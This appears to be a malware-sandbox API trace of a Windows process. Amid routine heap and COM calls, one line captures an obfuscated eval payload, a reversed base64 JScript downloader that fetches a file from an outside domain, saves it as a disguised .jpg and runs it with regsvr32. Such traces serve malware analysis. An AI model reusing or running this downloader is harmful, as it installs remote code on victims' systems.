[0091.517] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.517] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.517] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.517] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.517] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x143610 | out: hHeap=0x110000) returned 1
[0091.523] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x143578 | out: hHeap=0x110000) returned 1
[0091.523] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x143510 | out: hHeap=0x110000) returned 1
[0091.523] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1434a8 | out: hHeap=0x110000) returned 1
[0091.524] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x129338 | out: hHeap=0x110000) returned 1
[0091.524] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14d548 | out: hHeap=0x110000) returned 1
[0091.524] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14d4f0 | out: hHeap=0x110000) returned 1
[0091.525] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14cce8 | out: hHeap=0x110000) returned 1
[0091.525] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14c4e0 | out: hHeap=0x110000) returned 1
[0091.525] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14c450 | out: hHeap=0x110000) returned 1
[0091.525] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13b868 | out: hHeap=0x110000) returned 1
[0091.525] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17f410 | out: hHeap=0x110000) returned 1
[0091.526] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x133778 | out: hHeap=0x110000) returned 1
[0091.526] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.526] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13ab48 | out: hHeap=0x110000) returned 1
[0091.526] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x129158 | out: hHeap=0x110000) returned 1
[0091.526] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x174360 | out: hHeap=0x110000) returned 1
[0091.527] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1743f0 | out: hHeap=0x110000) returned 1
[0091.527] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1743a8 | out: hHeap=0x110000) returned 1
[0091.527] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x174318 | out: hHeap=0x110000) returned 1
[0091.527] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x174438 | out: hHeap=0x110000) returned 1
[0091.528] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x179f50 | out: hHeap=0x110000) returned 1
[0091.528] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1d45d0 | out: hHeap=0x110000) returned 1
[0091.528] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.528] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13df98 | out: hHeap=0x110000) returned 1
[0091.528] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.528] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13dfb0 | out: hHeap=0x110000) returned 1
[0091.528] GetCurrentThreadId () returned 0xe84
[0091.528] DestroyWindow (hWnd=0x20320) returned 1
[0091.546] NtdllDefWindowProc_W () returned 0x0
[0091.556] NtdllDefWindowProc_W () returned 0x0
[0091.557] NtdllDefWindowProc_W () returned 0x0
[0091.557] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.557] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x142950 | out: hHeap=0x110000) returned 1
[0091.560] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d780 | out: hHeap=0x110000) returned 1
[0091.560] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.560] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.560] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.560] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13e088 | out: hHeap=0x110000) returned 1
[0091.560] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.560] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x140758 | out: hHeap=0x110000) returned 1
[0091.561] SetEvent (hEvent=0x1b8) returned 1
[0091.564] GetCurrentThreadId () returned 0xe84
[0091.564] WaitForSingleObject (hHandle=0x138, dwMilliseconds=0x1388) returned 0x0
[0091.564] GetExitCodeThread (in: hThread=0x138, lpExitCode=0x39fb9c | out: lpExitCode=0x39fb9c) returned 1
[0091.565] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x144f30) returned 0x0
[0091.565] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.566] ReleaseActCtx (in: hActCtx=0x140c8c | out: hActCtx=0x140c8c)
[0091.566] FreeLibrary (hLibModule=0x747d0000) returned 1
[0091.566] FreeLibrary (hLibModule=0x747d0000) returned 1
[0091.566] UnregisterClassW (lpClassName=0xc178, hInstance=0x73870000) returned 1
[0091.566] UnregisterClassW (lpClassName=0xc171, hInstance=0x73870000) returned 1
[0091.566] OleUninitialize ()
[0091.566] DestroyWindow (hWnd=0x20312) returned 1
[0091.566] NtdllDefWindowProc_W () returned 0x0
[0091.567] PostQuitMessage (nExitCode=0)
[0091.568] DllCanUnloadNow () returned 0x0
[0091.568] DllCanUnloadNow () returned 0x0
[0091.568] DllCanUnloadNow () returned 0x1
[0091.568] DllCanUnloadNow () returned 0x1
[0091.569] free (_Block=0x5fe4f8)
[0091.649] free (_Block=0x29ba638)
[0091.649] ??3@YAXPAX@Z () returned 0x1
[0091.649] ??3@YAXPAX@Z () returned 0x20001
[0091.649] ??3@YAXPAX@Z () returned 0x1
[0091.649] ??3@YAXPAX@Z () returned 0x1
[0091.650] free (_Block=0x5fda58)
[0091.653] GetProcAddress (hModule=0x76c20000, lpProcName="UnregisterTraceGuids") returned 0x77a39286
[0091.653] EtwUnregisterTraceGuids () returned 0x0
[0091.653] GetProcAddress (hModule=0x76c20000, lpProcName="UnregisterTraceGuids") returned 0x77a39286
[0091.653] EtwUnregisterTraceGuids () returned 0x0
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x8fd0001
[0091.654] ??3@YAXPAX@Z () returned 0xd30001
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x1
[0091.654] ??3@YAXPAX@Z () returned 0x82c0001
[0091.654] ??3@YAXPAX@Z () returned 0x20001
[0091.654] ??3@YAXPAX@Z () returned 0x1a40001
[0091.654] ??3@YAXPAX@Z () returned 0x2750001
[0091.654] ??3@YAXPAX@Z () returned 0x3460001
[0091.654] ??3@YAXPAX@Z () returned 0x4170001
[0091.654] ??3@YAXPAX@Z () returned 0x4e80001
[0091.654] ??3@YAXPAX@Z () returned 0x5b90001
[0091.654] ??3@YAXPAX@Z () returned 0x68a0001
[0091.655] free (_Block=0x5fd9d0)
[0091.663] NtdllDefWindowProc_W () returned 0x0
[0091.664] FreeLibrary (hLibModule=0x73870000) returned 1
[0091.664] GetCurrentThreadId () returned 0xe84
[0091.664] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x133798 | out: hHeap=0x110000) returned 1
[0091.664] DeleteObject (ho=0xb0a0bdc) returned 1
[0091.664] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x188af0 | out: hHeap=0x110000) returned 1
[0091.665] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17ea90 | out: hHeap=0x110000) returned 1
[0091.665] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x188f00 | out: hHeap=0x110000) returned 1
[0091.665] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x188d78 | out: hHeap=0x110000) returned 1
[0091.665] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x188330 | out: hHeap=0x110000) returned 1
[0091.666] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12ec78 | out: hHeap=0x110000) returned 1
[0091.666] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d168 | out: hHeap=0x110000) returned 1
[0091.666] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1449e0 | out: hHeap=0x110000) returned 1
[0091.666] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14b868 | out: hHeap=0x110000) returned 1
[0091.667] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.667] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.667] DeleteObject (ho=0xa080bd1) returned 1
[0091.667] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d198 | out: hHeap=0x110000) returned 1
[0091.668] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d108 | out: hHeap=0x110000) returned 1
[0091.668] EtwUnregisterTraceGuids () returned 0x0
[0091.668] EtwUnregisterTraceGuids () returned 0x0
[0091.668] EtwEventUnregister () returned 0x0
[0091.668] EtwEventUnregister () returned 0x0
[0091.668] CloseHandle (hObject=0xc0) returned 1
[0091.668] UnmapViewOfFile (lpBaseAddress=0x250000) returned 1
[0091.893] CloseHandle (hObject=0xc4) returned 1
[0091.893] LocalFree (hMem=0x12ea20) returned 0x0
[0091.893] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.893] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.893] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.893] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.893] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.893] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.893] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.893] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.893] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.894] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1353a0 | out: hHeap=0x110000) returned 1
[0091.894] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.894] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.894] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.894] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.894] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.894] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12e818 | out: hHeap=0x110000) returned 1
[0091.895] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x123df8 | out: hHeap=0x110000) returned 1
[0091.895] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12ea60 | out: hHeap=0x110000) returned 1
[0091.895] FreeLibrary (hLibModule=0x757f0000) returned 1
[0091.895] FreeLibrary (hLibModule=0x74790000) returned 1
[0091.895] free (_Block=0x5f2680)
[0091.907] GetModuleHandleA (lpModuleName="mscoree.dll") returned 0x0
[0091.907] ExitProcess (uExitCode=0x0)
Thread:
id = 30
os_tid = 0xe8c
Thread:
id = 31
os_tid = 0xe94
[0080.357] GetCurrentThreadId () returned 0xe94
[0080.357] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x73870000
[0080.358] CoInitialize (pvReserved=0x0) returned 0x0
[0080.358] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x927c0) returned 0x0
[0080.359] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1006) returned 0x155d28
[0080.359] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x155600 | out: hHeap=0x110000) returned 1
[0080.359] IInternetProtocol:Read (in: This=0x153968, pv=0x155df0, cb=0xf38, pcbRead=0x24dff1c | out: pv=0x155df0, pcbRead=0x24dff1c*=0xf14) returned 0x1
[0080.360] IInternetProtocolRoot:Terminate (This=0x153968, dwOptions=0x0) returned 0x0
[0080.360] IUnknown:Release (This=0x15330c) returned 0x4
[0080.360] IUnknown:Release (This=0x153344) returned 0x3
[0080.360] IUnknown:Release (This=0x153344) returned 0x2
[0080.360] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1fbe) returned 0x156d38
[0080.360] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x155d28, cbMultiByte=4060, lpWideCharStr=0x156d3c, cchWideChar=4060 | out: lpWideCharStr="eval
fX17KWUoaGN0YWN9O2Vzb2xjLnh0Um9lZGlWZWxiYXQ7KTIgLCJncGouN0lldHliYWdpZ1xcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMueHRSb2VkaVZlbGJhdDspeWRvYmVzbm9wc2VyLnJlcHVTcm9zc2Vjb3JQb2VkaXYoZXRpcncueHRSb2VkaVZlbGJhdDsxID0gZXB5dC54dFJvZWRpVmVsYmF0O25lcG8ueHRSb2VkaVZlbGJhdDspIm1hZXJ0cy5iZG9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSB4dFJvZWRpVmVsYmF0IHJhdnt5cnR7KTAwMiA9PSBzdXRhdHMucmVwdVNyb3NzZWNvclBvZWRpdihmaTspKGRuZXMucmVwdVNyb3NzZWNvclBvZWRpdjspZXNsYWYgLCIwYk85ZDN6QUpOZGlBeXg5alpPeldnT3QwMT1kaXMmcUVQNTh4QURpaHNMQWFQdDhYQmpDWWNqY1h3WnZkPWVnYXAmdnQxczdwV1ZSSEdMWUpmNmdyY0QwZHl2WVg9ZWdhcCY1Nm1ldVFhQkI4Vj1lZ2FwPzNpY2F2L0YxVXJyRVgxVUFGYlJMekFBeUcvVHhlV2FiaURpOGRlR3FhdWVCTkdsRmZEV2FjQXA5TmtGNy83NzJRRkd2RklQZ3BiNlZsdHhHaHVFYnNEdHpIT3l2ZnFWYVZwNWJZODZJY3d1clMvMDgyOTQvcDB4ZGVISVZrU0kvQkZTd25lYVVmelNlS2svVEZiSWVnUWNNZjJlNWg0Yjl4SDB4RWU0aE1xalMvN29lcm9rbmx5SzkxdTllTkRBTXBTQXJhQ2JuUUxUZUpLTGFBcmpRSWhBcS82eW5zVHBaNnZCWndYazlCTWZMSzB0QlNhSVluaTUvVmdSRDRvckppOUZPQkdqT3hERjg3YXZGVFc1UVM3ZXlDbGNkOEwvZWhyZi9tb2MuZ3Rzb29ibGV0YXAvLzpwdHRoIiAsIlRFRyIobmVwby5yZXB1U3Jvc3NlY29yUG9lZGl2OykicHR0aGxteC4ybG14c20iKHRjZWpiT1hldml0Y0Egd2VuID0gcmVwdVNyb3NzZWNvclBvZWRpdiByYXY=---OykiZ3BqLjdJZXR5YmFnaWdcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzcnZzZ2VyIihudXIuZXR5YmFnaUdlbGJhVHh0cjspInRjZWpib21ldHN5c2VsaWYuZ25pdHBpcmNzIih0Y2VqYk9YZXZpdGNBIHdlbiA9IGVsYmFUZXN1b003aSByYXY7KSJsbGVocy50cGlyY3N3Iih0Y2VqYk9YZXZpdGNBIHdlbiA9IGV0eWJhZ2lHZWxiYVR4dHIgcmF2
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
\r\n") returned 4060
[0080.360] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x108) returned 0x158d00
[0080.361] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x208) returned 0x158e10
[0080.361] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x133bf8
[0080.361] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x133bf8 | out: hHeap=0x110000) returned 1
[0080.361] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x68) returned 0x1545c0
[0080.361] IUnknown:AddRef (This=0x13be24) returned 0x14
[0080.361] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x1a8) returned 0x159020
[0080.361] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24dfe64 | out: lpCPInfo=0x24dfe64) returned 1
[0080.361] IUnknown:AddRef (This=0x1467f8) returned 0x4
[0080.361] IUnknown:AddRef (This=0x13be24) returned 0x15
[0080.361] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x24dfe6c | out: ppvObject=0x24dfe6c*=0x13be24) returned 0x0
[0080.362] IUnknown:Release (This=0x13be24) returned 0x15
[0080.362] IUnknown:AddRef (This=0x13be24) returned 0x16
[0080.362] IUri:GetScheme (in: This=0x13be24, pdwScheme=0x24dfe70 | out: pdwScheme=0x24dfe70*=0x9) returned 0x0
[0080.362] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x8006) returned 0x1591d0
[0080.362] IUnknown:Release (This=0x13be24) returned 0x15
[0080.363] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1006) returned 0x1611e0
[0080.363] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x4000) returned 0x1621f0
[0080.364] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1621f0 | out: hHeap=0x110000) returned 1
[0080.377] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x108) returned 0x1621f0
[0080.377] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x133bf8
[0080.377] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x133bf8 | out: hHeap=0x110000) returned 1
[0080.377] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x133bf8
[0080.378] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x133bf8 | out: hHeap=0x110000) returned 1
[0080.378] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x133bf8
[0080.378] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x133bf8 | out: hHeap=0x110000) returned 1
[0080.378] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x927c0) returned 0x0
[0080.380] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x927c0) returned 0x0
[0083.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x156d04, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0
[0083.659] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x17a3f0
[0083.660] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17a3f0 | out: hHeap=0x110000) returned 1
[0083.661] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1621f0 | out: hHeap=0x110000) returned 1
[0083.661] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1591d0 | out: hHeap=0x110000) returned 1
[0083.662] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1545c0 | out: hHeap=0x110000) returned 1
[0083.662] IUnknown:Release (This=0x13be24) returned 0xe
[0083.662] IUnknown:Release (This=0x1467f8) returned 0x3
[0083.662] IUnknown:Release (This=0x13be24) returned 0xd
[0083.662] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.662] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.663] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1611e0 | out: hHeap=0x110000) returned 1
[0083.663] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x159020 | out: hHeap=0x110000) returned 1
[0083.663] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x68) returned 0x1545c0
[0083.663] IUnknown:AddRef (This=0x13be24) returned 0xe
[0083.663] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x1a8) returned 0x17d968
[0083.663] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24dfe64 | out: lpCPInfo=0x24dfe64) returned 1
[0083.663] IUnknown:AddRef (This=0x1467f8) returned 0x4
[0083.664] IUnknown:AddRef (This=0x13be24) returned 0xf
[0083.664] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x24dfe6c | out: ppvObject=0x24dfe6c*=0x13be24) returned 0x0
[0083.664] IUnknown:Release (This=0x13be24) returned 0xf
[0083.664] IUnknown:AddRef (This=0x13be24) returned 0x10
[0083.664] IUri:GetScheme (in: This=0x13be24, pdwScheme=0x24dfe70 | out: pdwScheme=0x24dfe70*=0x9) returned 0x0
[0083.664] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x8006) returned 0x159020
[0083.665] IUnknown:Release (This=0x13be24) returned 0xf
[0083.665] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x177ea0, Size=0x9c) returned 0x17ce90
[0083.665] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1006) returned 0x175c28
[0083.665] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x4000) returned 0x187688
[0083.666] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x187688 | out: hHeap=0x110000) returned 1
[0083.666] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x108) returned 0x176c38
[0083.666] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x17a3f0
[0083.666] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17a3f0 | out: hHeap=0x110000) returned 1
[0083.666] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x17a3f0
[0083.666] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17a3f0 | out: hHeap=0x110000) returned 1
[0083.667] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x927c0) returned 0x0
[0083.772] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x156d04, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0
[0083.772] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x17a490
[0083.772] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17a490 | out: hHeap=0x110000) returned 1
[0083.773] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x176c38 | out: hHeap=0x110000) returned 1
[0083.787] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x159020 | out: hHeap=0x110000) returned 1
[0083.788] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1545c0 | out: hHeap=0x110000) returned 1
[0083.788] IUnknown:Release (This=0x13be24) returned 0xe
[0083.788] IUnknown:Release (This=0x1467f8) returned 0x3
[0083.788] IUnknown:Release (This=0x13be24) returned 0xd
[0083.788] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.788] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0083.788] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x175c28 | out: hHeap=0x110000) returned 1
[0083.788] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17d968 | out: hHeap=0x110000) returned 1
[0083.788] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x68) returned 0x1545c0
[0083.788] IUnknown:AddRef (This=0x13be24) returned 0xe
[0083.788] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x1a8) returned 0x17d968
[0083.789] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x24dfe64 | out: lpCPInfo=0x24dfe64) returned 1
[0083.789] IUnknown:AddRef (This=0x1467f8) returned 0x4
[0083.789] IUnknown:AddRef (This=0x13be24) returned 0xf
[0083.789] IUnknown:QueryInterface (in: This=0x13be24, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x24dfe6c | out: ppvObject=0x24dfe6c*=0x13be24) returned 0x0
[0083.789] IUnknown:Release (This=0x13be24) returned 0xf
[0083.789] IUnknown:AddRef (This=0x13be24) returned 0x10
[0083.789] IUri:GetScheme (in: This=0x13be24, pdwScheme=0x24dfe70 | out: pdwScheme=0x24dfe70*=0x9) returned 0x0
[0083.789] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x8006) returned 0x159020
[0083.790] IUnknown:Release (This=0x13be24) returned 0xf
[0083.790] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x1006) returned 0x175c28
[0083.790] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x4000) returned 0x190ed0
[0083.791] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x190ed0 | out: hHeap=0x110000) returned 1
[0083.791] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x108) returned 0x176c38
[0083.791] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x17a490
[0083.791] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17a490 | out: hHeap=0x110000) returned 1
[0083.792] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0x927c0) returned 0x0
[0090.960] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x12) returned 0x17a730
[0090.960] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17a730 | out: hHeap=0x110000) returned 1
[0090.961] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x176c38 | out: hHeap=0x110000) returned 1
[0090.961] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x159020 | out: hHeap=0x110000) returned 1
[0090.962] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1545c0 | out: hHeap=0x110000) returned 1
[0090.962] IUnknown:Release (This=0x13be24) returned 0xe
[0090.962] IUnknown:Release (This=0x1467f8) returned 0x3
[0090.962] IUnknown:Release (This=0x13be24) returned 0xd
[0090.962] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0090.962] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
